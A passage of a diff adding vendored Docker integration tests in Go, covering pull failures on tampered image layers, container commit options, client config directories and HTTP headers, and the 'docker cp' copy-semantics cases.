*check.C) { + testRequires(c, DaemonIsLinux) + manifestDigest, err := setupImage(c) + c.Assert(err, checker.IsNil) + + // Load the target manifest blob. + manifestBlob := s.reg.readBlobContents(c, manifestDigest) + + var imgManifest schema2.Manifest + err = json.Unmarshal(manifestBlob, &imgManifest) + c.Assert(err, checker.IsNil) + + // Next, get the digest of one of the layers from the manifest. + targetLayerDigest := imgManifest.Layers[0].Digest + + // Move the existing data file aside, so that we can replace it with a + // malicious blob of data. NOTE: we defer the returned undo func. + undo := s.reg.tempMoveBlobData(c, targetLayerDigest) + defer undo() + + // Now make a fake data blob in this directory. + s.reg.writeBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for.")) + + // Now try pulling that image by digest. We should get an error about + // digest verification for the target layer digest. + + // Remove distribution cache to force a re-pull of the blobs + if err := os.RemoveAll(filepath.Join(dockerBasePath, "image", s.d.storageDriver, "distribution")); err != nil { + c.Fatalf("error clearing distribution cache: %v", err) + } + + // Pull from the registry using the @ reference. + imageReference := fmt.Sprintf("%s@%s", repoName, manifestDigest) + out, exitStatus, _ := dockerCmdWithError("pull", imageReference) + c.Assert(exitStatus, checker.Not(check.Equals), 0, check.Commentf("expected a non-zero exit status")) + + expectedErrorMsg := fmt.Sprintf("filesystem layer verification failed for digest %s", targetLayerDigest) + c.Assert(out, checker.Contains, expectedErrorMsg, check.Commentf("expected error message in output: %s", out)) +} + +// TestPullFailsWithAlteredLayer tests that a `docker pull` fails when +// we have modified a layer blob and its digest cannot be verified. +// This is the schema1 version of the test. +func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) { + testRequires(c, DaemonIsLinux) + manifestDigest, err := setupImage(c) + c.Assert(err, checker.IsNil) + + // Load the target manifest blob. + manifestBlob := s.reg.readBlobContents(c, manifestDigest) + + var imgManifest schema1.Manifest + err = json.Unmarshal(manifestBlob, &imgManifest) + c.Assert(err, checker.IsNil) + + // Next, get the digest of one of the layers from the manifest. + targetLayerDigest := imgManifest.FSLayers[0].BlobSum + + // Move the existing data file aside, so that we can replace it with a + // malicious blob of data. NOTE: we defer the returned undo func. + undo := s.reg.tempMoveBlobData(c, targetLayerDigest) + defer undo() + + // Now make a fake data blob in this directory. + s.reg.writeBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for.")) + + // Now try pulling that image by digest. We should get an error about + // digest verification for the target layer digest. + + // Remove distribution cache to force a re-pull of the blobs + if err := os.RemoveAll(filepath.Join(dockerBasePath, "image", s.d.storageDriver, "distribution")); err != nil { + c.Fatalf("error clearing distribution cache: %v", err) + } + + // Pull from the registry using the @ reference. + imageReference := fmt.Sprintf("%s@%s", repoName, manifestDigest) + out, exitStatus, _ := dockerCmdWithError("pull", imageReference) + c.Assert(exitStatus, checker.Not(check.Equals), 0, check.Commentf("expected a non-zero exit status")) + + expectedErrorMsg := fmt.Sprintf("filesystem layer verification failed for digest %s", targetLayerDigest) + c.Assert(out, checker.Contains, expectedErrorMsg, check.Commentf("expected error message in output: %s", out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go new file mode 100644 index 0000000000..8008ae1716 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go @@ -0,0 +1,157 @@ +package main + +import ( + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestCommitAfterContainerIsDone(c *check.C) { + out, _ := dockerCmd(c, "run", "-i", "-a", "stdin", "busybox", "echo", "foo") + + cleanedContainerID := strings.TrimSpace(out) + + dockerCmd(c, "wait", cleanedContainerID) + + out, _ = dockerCmd(c, "commit", cleanedContainerID) + + cleanedImageID := strings.TrimSpace(out) + + dockerCmd(c, "inspect", cleanedImageID) +} + +func (s *DockerSuite) TestCommitWithoutPause(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-i", "-a", "stdin", "busybox", "echo", "foo") + + cleanedContainerID := strings.TrimSpace(out) + + dockerCmd(c, "wait", cleanedContainerID) + + out, _ = dockerCmd(c, "commit", "-p=false", cleanedContainerID) + + cleanedImageID := strings.TrimSpace(out) + + dockerCmd(c, "inspect", cleanedImageID) +} + +//test commit a paused container should not unpause it after commit +func (s *DockerSuite) TestCommitPausedContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + defer unpauseAllContainers() + out, _ := dockerCmd(c, "run", "-i", "-d", "busybox") + + cleanedContainerID := strings.TrimSpace(out) + + dockerCmd(c, "pause", cleanedContainerID) + + out, _ = dockerCmd(c, "commit", cleanedContainerID) + + out = inspectField(c, cleanedContainerID, "State.Paused") + // commit should not unpause a paused container + c.Assert(out, checker.Contains, "true") +} + +func (s *DockerSuite) TestCommitNewFile(c *check.C) { + dockerCmd(c, "run", "--name", "commiter", "busybox", "/bin/sh", "-c", "echo koye > /foo") + + imageID, _ := dockerCmd(c, "commit", "commiter") + imageID = strings.TrimSpace(imageID) + + out, _ := dockerCmd(c, "run", imageID, "cat", "/foo") + actual := strings.TrimSpace(out) + c.Assert(actual, checker.Equals, "koye") +} + +func (s *DockerSuite) TestCommitHardlink(c *check.C) { + testRequires(c, DaemonIsLinux) + firstOutput, _ := dockerCmd(c, "run", "-t", "--name", "hardlinks", "busybox", "sh", "-c", "touch file1 && ln file1 file2 && ls -di file1 file2") + + chunks := strings.Split(strings.TrimSpace(firstOutput), " ") + inode := chunks[0] + chunks = strings.SplitAfterN(strings.TrimSpace(firstOutput), " ", 2) + c.Assert(chunks[1], checker.Contains, chunks[0], check.Commentf("Failed to create hardlink in a container. Expected to find %q in %q", inode, chunks[1:])) + + imageID, _ := dockerCmd(c, "commit", "hardlinks", "hardlinks") + imageID = strings.TrimSpace(imageID) + + secondOutput, _ := dockerCmd(c, "run", "-t", "hardlinks", "ls", "-di", "file1", "file2") + + chunks = strings.Split(strings.TrimSpace(secondOutput), " ") + inode = chunks[0] + chunks = strings.SplitAfterN(strings.TrimSpace(secondOutput), " ", 2) + c.Assert(chunks[1], checker.Contains, chunks[0], check.Commentf("Failed to create hardlink in a container. Expected to find %q in %q", inode, chunks[1:])) +} + +func (s *DockerSuite) TestCommitTTY(c *check.C) { + dockerCmd(c, "run", "-t", "--name", "tty", "busybox", "/bin/ls") + + imageID, _ := dockerCmd(c, "commit", "tty", "ttytest") + imageID = strings.TrimSpace(imageID) + + dockerCmd(c, "run", "ttytest", "/bin/ls") +} + +func (s *DockerSuite) TestCommitWithHostBindMount(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name", "bind-commit", "-v", "/dev/null:/winning", "busybox", "true") + + imageID, _ := dockerCmd(c, "commit", "bind-commit", "bindtest") + imageID = strings.TrimSpace(imageID) + + dockerCmd(c, "run", "bindtest", "true") +} + +func (s *DockerSuite) TestCommitChange(c *check.C) { + dockerCmd(c, "run", "--name", "test", "busybox", "true") + + imageID, _ := dockerCmd(c, "commit", + "--change", "EXPOSE 8080", + "--change", "ENV DEBUG true", + "--change", "ENV test 1", + "--change", "ENV PATH /foo", + "--change", "LABEL foo bar", + "--change", "CMD [\"/bin/sh\"]", + "--change", "WORKDIR /opt", + "--change", "ENTRYPOINT [\"/bin/sh\"]", + "--change", "USER testuser", + "--change", "VOLUME /var/lib/docker", + "--change", "ONBUILD /usr/local/bin/python-build --dir /app/src", + "test", "test-commit") + imageID = strings.TrimSpace(imageID) + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + prefix = strings.ToUpper(prefix) // Force C: as that's how WORKDIR is normalised on Windows + expected := map[string]string{ + "Config.ExposedPorts": "map[8080/tcp:{}]", + "Config.Env": "[DEBUG=true test=1 PATH=/foo]", + "Config.Labels": "map[foo:bar]", + "Config.Cmd": "[/bin/sh]", + "Config.WorkingDir": prefix + slash + "opt", + "Config.Entrypoint": "[/bin/sh]", + "Config.User": "testuser", + "Config.Volumes": "map[/var/lib/docker:{}]", + "Config.OnBuild": "[/usr/local/bin/python-build --dir /app/src]", + } + + for conf, value := range expected { + res := inspectField(c, imageID, conf) + if res != value { + c.Errorf("%s('%s'), expected %s", conf, res, value) + } + } +} + +func (s *DockerSuite) TestCommitChangeLabels(c *check.C) { + dockerCmd(c, "run", "--name", "test", "--label", "some=label", "busybox", "true") + + imageID, _ := dockerCmd(c, "commit", + "--change", "LABEL some=label2", + "test", "test-commit") + imageID = strings.TrimSpace(imageID) + + c.Assert(inspectField(c, imageID, "Config.Labels"), checker.Equals, "map[some:label2]") + // check that container labels didn't change + c.Assert(inspectField(c, "test", "Config.Labels"), checker.Equals, "map[some:label]") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go new file mode 100644 index 0000000000..1d5e5ad3db --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go @@ -0,0 +1,140 @@ +package main + +import ( + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "os/exec" + "path/filepath" + "runtime" + + "github.com/docker/docker/api" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/homedir" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestConfigHTTPHeader(c *check.C) { + testRequires(c, UnixCli) // Can't set/unset HOME on windows right now + // We either need a level of Go that supports Unsetenv (for cases + // when HOME/USERPROFILE isn't set), or we need to be able to use + // os/user but user.Current() only works if we aren't statically compiling + + var headers map[string][]string + + server := httptest.NewServer(http.HandlerFunc( + func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("API-Version", api.DefaultVersion) + headers = r.Header + })) + defer server.Close() + + homeKey := homedir.Key() + homeVal := homedir.Get() + tmpDir, err := ioutil.TempDir("", "fake-home") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + + dotDocker := filepath.Join(tmpDir, ".docker") + os.Mkdir(dotDocker, 0600) + tmpCfg := filepath.Join(dotDocker, "config.json") + + defer func() { os.Setenv(homeKey, homeVal) }() + os.Setenv(homeKey, tmpDir) + + data := `{ + "HttpHeaders": { "MyHeader": "MyValue" } + }` + + err = ioutil.WriteFile(tmpCfg, []byte(data), 0600) + c.Assert(err, checker.IsNil) + + cmd := exec.Command(dockerBinary, "-H="+server.URL[7:], "ps") + out, _, _ := runCommandWithOutput(cmd) + + c.Assert(headers["User-Agent"], checker.NotNil, check.Commentf("Missing User-Agent")) + + c.Assert(headers["User-Agent"][0], checker.Equals, "Docker-Client/"+dockerversion.Version+" ("+runtime.GOOS+")", check.Commentf("Badly formatted User-Agent,out:%v", out)) + + c.Assert(headers["Myheader"], checker.NotNil) + c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("Missing/bad header,out:%v", out)) + +} + +func (s *DockerSuite) TestConfigDir(c *check.C) { + cDir, err := ioutil.TempDir("", "fake-home") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(cDir) + + // First make sure pointing to empty dir doesn't generate an error + dockerCmd(c, "--config", cDir, "ps") + + // Test with env var too + cmd := exec.Command(dockerBinary, "ps") + cmd.Env = appendBaseEnv(true, "DOCKER_CONFIG="+cDir) + out, _, err := runCommandWithOutput(cmd) + + c.Assert(err, checker.IsNil, check.Commentf("ps2 didn't work,out:%v", out)) + + // Start a server so we can check to see if the config file was + // loaded properly + var headers map[string][]string + + server := httptest.NewServer(http.HandlerFunc( + func(w http.ResponseWriter, r *http.Request) { + headers = r.Header + })) + defer server.Close() + + // Create a dummy config file in our new config dir + data := `{ + "HttpHeaders": { "MyHeader": "MyValue" } + }` + + tmpCfg := filepath.Join(cDir, "config.json") + err = ioutil.WriteFile(tmpCfg, []byte(data), 0600) + c.Assert(err, checker.IsNil, check.Commentf("Err creating file")) + + env := appendBaseEnv(false) + + cmd = exec.Command(dockerBinary, "--config", cDir, "-H="+server.URL[7:], "ps") + cmd.Env = env + out, _, err = runCommandWithOutput(cmd) + + c.Assert(err, checker.NotNil, check.Commentf("out:%v", out)) + c.Assert(headers["Myheader"], checker.NotNil) + c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps3 - Missing header,out:%v", out)) + + // Reset headers and try again using env var this time + headers = map[string][]string{} + cmd = exec.Command(dockerBinary, "-H="+server.URL[7:], "ps") + cmd.Env = append(env, "DOCKER_CONFIG="+cDir) + out, _, err = runCommandWithOutput(cmd) + + c.Assert(err, checker.NotNil, check.Commentf("%v", out)) + c.Assert(headers["Myheader"], checker.NotNil) + c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps4 - Missing header,out:%v", out)) + + // Reset headers and make sure flag overrides the env var + headers = map[string][]string{} + cmd = exec.Command(dockerBinary, "--config", cDir, "-H="+server.URL[7:], "ps") + cmd.Env = append(env, "DOCKER_CONFIG=MissingDir") + out, _, err = runCommandWithOutput(cmd) + + c.Assert(err, checker.NotNil, check.Commentf("out:%v", out)) + c.Assert(headers["Myheader"], checker.NotNil) + c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps5 - Missing header,out:%v", out)) + + // Reset headers and make sure flag overrides the env var. + // Almost same as previous but make sure the "MissingDir" isn't + // ignore - we don't want to default back to the env var. + headers = map[string][]string{} + cmd = exec.Command(dockerBinary, "--config", "MissingDir", "-H="+server.URL[7:], "ps") + cmd.Env = append(env, "DOCKER_CONFIG="+cDir) + out, _, err = runCommandWithOutput(cmd) + + c.Assert(err, checker.NotNil, check.Commentf("out:%v", out)) + c.Assert(headers["Myheader"], checker.IsNil, check.Commentf("ps6 - Headers shouldn't be the expected value,out:%v", out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go new file mode 100644 index 0000000000..9ed7e8c720 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go @@ -0,0 +1,488 @@ +package main + +import ( + "os" + "path/filepath" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// docker cp CONTAINER:PATH LOCALPATH + +// Try all of the test cases from the archive package which implements the +// internals of `docker cp` and ensure that the behavior matches when actually +// copying to and from containers. + +// Basic assumptions about SRC and DST: +// 1. SRC must exist. +// 2. If SRC ends with a trailing separator, it must be a directory. +// 3. DST parent directory must exist. +// 4. If DST exists as a file, it must not end with a trailing separator. + +// First get these easy error cases out of the way. + +// Test for error when SRC does not exist. +func (s *DockerSuite) TestCpFromErrSrcNotExists(c *check.C) { + containerID := makeTestContainer(c, testContainerOptions{}) + + tmpDir := getTestDir(c, "test-cp-from-err-src-not-exists") + defer os.RemoveAll(tmpDir) + + err := runDockerCp(c, containerCpPath(containerID, "file1"), tmpDir) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) +} + +// Test for error when SRC ends in a trailing +// path separator but it exists as a file. +func (s *DockerSuite) TestCpFromErrSrcNotDir(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-err-src-not-dir") + defer os.RemoveAll(tmpDir) + + err := runDockerCp(c, containerCpPathTrailingSep(containerID, "file1"), tmpDir) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) +} + +// Test for error when SRC is a valid file or directory, +// bu the DST parent directory does not exist. +func (s *DockerSuite) TestCpFromErrDstParentNotExists(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-err-dst-parent-not-exists") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + // Try with a file source. + srcPath := containerCpPath(containerID, "/file1") + dstPath := cpPath(tmpDir, "notExists", "file1") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) + + // Try with a directory source. + srcPath = containerCpPath(containerID, "/dir1") + + err = runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) +} + +// Test for error when DST ends in a trailing +// path separator but exists as a file. +func (s *DockerSuite) TestCpFromErrDstNotDir(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-err-dst-not-dir") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + // Try with a file source. + srcPath := containerCpPath(containerID, "/file1") + dstPath := cpPathTrailingSep(tmpDir, "file1") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) + + // Try with a directory source. + srcPath = containerCpPath(containerID, "/dir1") + + err = runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) +} + +// Check that copying from a container to a local symlink copies to the symlink +// target and does not overwrite the local symlink itself. +func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-err-dst-not-dir") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + // First, copy a file from the container to a symlink to a file. This + // should overwrite the symlink target contents with the source contents. + srcPath := containerCpPath(containerID, "/file2") + dstPath := cpPath(tmpDir, "symlinkToFile1") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, dstPath, "file1"), checker.IsNil) + + // The file should have the contents of "file2" now. + c.Assert(fileContentEquals(c, cpPath(tmpDir, "file1"), "file2\n"), checker.IsNil) + + // Next, copy a file from the container to a symlink to a directory. This + // should copy the file into the symlink target directory. + dstPath = cpPath(tmpDir, "symlinkToDir1") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, dstPath, "dir1"), checker.IsNil) + + // The file should have the contents of "file2" now. + c.Assert(fileContentEquals(c, cpPath(tmpDir, "file2"), "file2\n"), checker.IsNil) + + // Next, copy a file from the container to a symlink to a file that does + // not exist (a broken symlink). This should create the target file with + // the contents of the source file. + dstPath = cpPath(tmpDir, "brokenSymlinkToFileX") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, dstPath, "fileX"), checker.IsNil) + + // The file should have the contents of "file2" now. + c.Assert(fileContentEquals(c, cpPath(tmpDir, "fileX"), "file2\n"), checker.IsNil) + + // Next, copy a directory from the container to a symlink to a local + // directory. This should copy the directory into the symlink target + // directory and not modify the symlink. + srcPath = containerCpPath(containerID, "/dir2") + dstPath = cpPath(tmpDir, "symlinkToDir1") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, dstPath, "dir1"), checker.IsNil) + + // The directory should now contain a copy of "dir2". + c.Assert(fileContentEquals(c, cpPath(tmpDir, "dir1/dir2/file2-1"), "file2-1\n"), checker.IsNil) + + // Next, copy a directory from the container to a symlink to a local + // directory that does not exist (a broken symlink). This should create + // the target as a directory with the contents of the source directory. It + // should not modify the symlink. + dstPath = cpPath(tmpDir, "brokenSymlinkToDirX") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, dstPath, "dirX"), checker.IsNil) + + // The "dirX" directory should now be a copy of "dir2". + c.Assert(fileContentEquals(c, cpPath(tmpDir, "dirX/file2-1"), "file2-1\n"), checker.IsNil) +} + +// Possibilities are reduced to the remaining 10 cases: +// +// case | srcIsDir | onlyDirContents | dstExists | dstIsDir | dstTrSep | action +// =================================================================================================== +// A | no | - | no | - | no | create file +// B | no | - | no | - | yes | error +// C | no | - | yes | no | - | overwrite file +// D | no | - | yes | yes | - | create file in dst dir +// E | yes | no | no | - | - | create dir, copy contents +// F | yes | no | yes | no | - | error +// G | yes | no | yes | yes | - | copy dir and contents +// H | yes | yes | no | - | - | create dir, copy contents +// I | yes | yes | yes | no | - | error +// J | yes | yes | yes | yes | - | copy dir contents +// + +// A. SRC specifies a file and DST (no trailing path separator) doesn't +// exist. This should create a file with the name DST and copy the +// contents of the source file into it. +func (s *DockerSuite) TestCpFromCaseA(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-from-case-a") + defer os.RemoveAll(tmpDir) + + srcPath := containerCpPath(containerID, "/root/file1") + dstPath := cpPath(tmpDir, "itWorks.txt") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) +} + +// B. SRC specifies a file and DST (with trailing path separator) doesn't +// exist. This should cause an error because the copy operation cannot +// create a directory when copying a single file. +func (s *DockerSuite) TestCpFromCaseB(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-case-b") + defer os.RemoveAll(tmpDir) + + srcPath := containerCpPath(containerID, "/file1") + dstDir := cpPathTrailingSep(tmpDir, "testDir") + + err := runDockerCp(c, srcPath, dstDir) + c.Assert(err, checker.NotNil) + + c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExists error, but got %T: %s", err, err)) +} + +// C. SRC specifies a file and DST exists as a file. This should overwrite +// the file at DST with the contents of the source file. +func (s *DockerSuite) TestCpFromCaseC(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-from-case-c") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := containerCpPath(containerID, "/root/file1") + dstPath := cpPath(tmpDir, "file2") + + // Ensure the local file starts with different content. + c.Assert(fileContentEquals(c, dstPath, "file2\n"), checker.IsNil) + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) +} + +// D. SRC specifies a file and DST exists as a directory. This should place +// a copy of the source file inside it using the basename from SRC. Ensure +// this works whether DST has a trailing path separator or not. +func (s *DockerSuite) TestCpFromCaseD(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-case-d") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := containerCpPath(containerID, "/file1") + dstDir := cpPath(tmpDir, "dir1") + dstPath := filepath.Join(dstDir, "file1") + + // Ensure that dstPath doesn't exist. + _, err := os.Stat(dstPath) + c.Assert(os.IsNotExist(err), checker.True, check.Commentf("did not expect dstPath %q to exist", dstPath)) + + c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // unable to remove dstDir + c.Assert(os.RemoveAll(dstDir), checker.IsNil) + + // unable to make dstDir + c.Assert(os.MkdirAll(dstDir, os.FileMode(0755)), checker.IsNil) + + dstDir = cpPathTrailingSep(tmpDir, "dir1") + + c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) +} + +// E. SRC specifies a directory and DST does not exist. This should create a +// directory at DST and copy the contents of the SRC directory into the DST +// directory. Ensure this works whether DST has a trailing path separator or +// not. +func (s *DockerSuite) TestCpFromCaseE(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-case-e") + defer os.RemoveAll(tmpDir) + + srcDir := containerCpPath(containerID, "dir1") + dstDir := cpPath(tmpDir, "testDir") + dstPath := filepath.Join(dstDir, "file1-1") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // unable to remove dstDir + c.Assert(os.RemoveAll(dstDir), checker.IsNil) + + dstDir = cpPathTrailingSep(tmpDir, "testDir") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) +} + +// F. SRC specifies a directory and DST exists as a file. This should cause an +// error as it is not possible to overwrite a file with a directory. +func (s *DockerSuite) TestCpFromCaseF(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-from-case-f") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := containerCpPath(containerID, "/root/dir1") + dstFile := cpPath(tmpDir, "file1") + + err := runDockerCp(c, srcDir, dstFile) + c.Assert(err, checker.NotNil) + + c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) +} + +// G. SRC specifies a directory and DST exists as a directory. This should copy +// the SRC directory and all its contents to the DST directory. Ensure this +// works whether DST has a trailing path separator or not. +func (s *DockerSuite) TestCpFromCaseG(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-from-case-g") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := containerCpPath(containerID, "/root/dir1") + dstDir := cpPath(tmpDir, "dir2") + resultDir := filepath.Join(dstDir, "dir1") + dstPath := filepath.Join(resultDir, "file1-1") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // unable to remove dstDir + c.Assert(os.RemoveAll(dstDir), checker.IsNil) + + // unable to make dstDir + c.Assert(os.MkdirAll(dstDir, os.FileMode(0755)), checker.IsNil) + + dstDir = cpPathTrailingSep(tmpDir, "dir2") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) +} + +// H. SRC specifies a directory's contents only and DST does not exist. This +// should create a directory at DST and copy the contents of the SRC +// directory (but not the directory itself) into the DST directory. Ensure +// this works whether DST has a trailing path separator or not. +func (s *DockerSuite) TestCpFromCaseH(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-from-case-h") + defer os.RemoveAll(tmpDir) + + srcDir := containerCpPathTrailingSep(containerID, "dir1") + "." + dstDir := cpPath(tmpDir, "testDir") + dstPath := filepath.Join(dstDir, "file1-1") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // unable to remove resultDir + c.Assert(os.RemoveAll(dstDir), checker.IsNil) + + dstDir = cpPathTrailingSep(tmpDir, "testDir") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) +} + +// I. SRC specifies a directory's contents only and DST exists as a file. This +// should cause an error as it is not possible to overwrite a file with a +// directory. +func (s *DockerSuite) TestCpFromCaseI(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-from-case-i") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := containerCpPathTrailingSep(containerID, "/root/dir1") + "." + dstFile := cpPath(tmpDir, "file1") + + err := runDockerCp(c, srcDir, dstFile) + c.Assert(err, checker.NotNil) + + c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) +} + +// J. SRC specifies a directory's contents only and DST exists as a directory. +// This should copy the contents of the SRC directory (but not the directory +// itself) into the DST directory. Ensure this works whether DST has a +// trailing path separator or not. +func (s *DockerSuite) TestCpFromCaseJ(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{ + addContent: true, workDir: "/root", + }) + + tmpDir := getTestDir(c, "test-cp-from-case-j") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcDir := containerCpPathTrailingSep(containerID, "/root/dir1") + "." + dstDir := cpPath(tmpDir, "dir2") + dstPath := filepath.Join(dstDir, "file1-1") + + c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + + c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) + + // Now try again but using a trailing path separator for dstDir. + + // unable to remove dstDir + 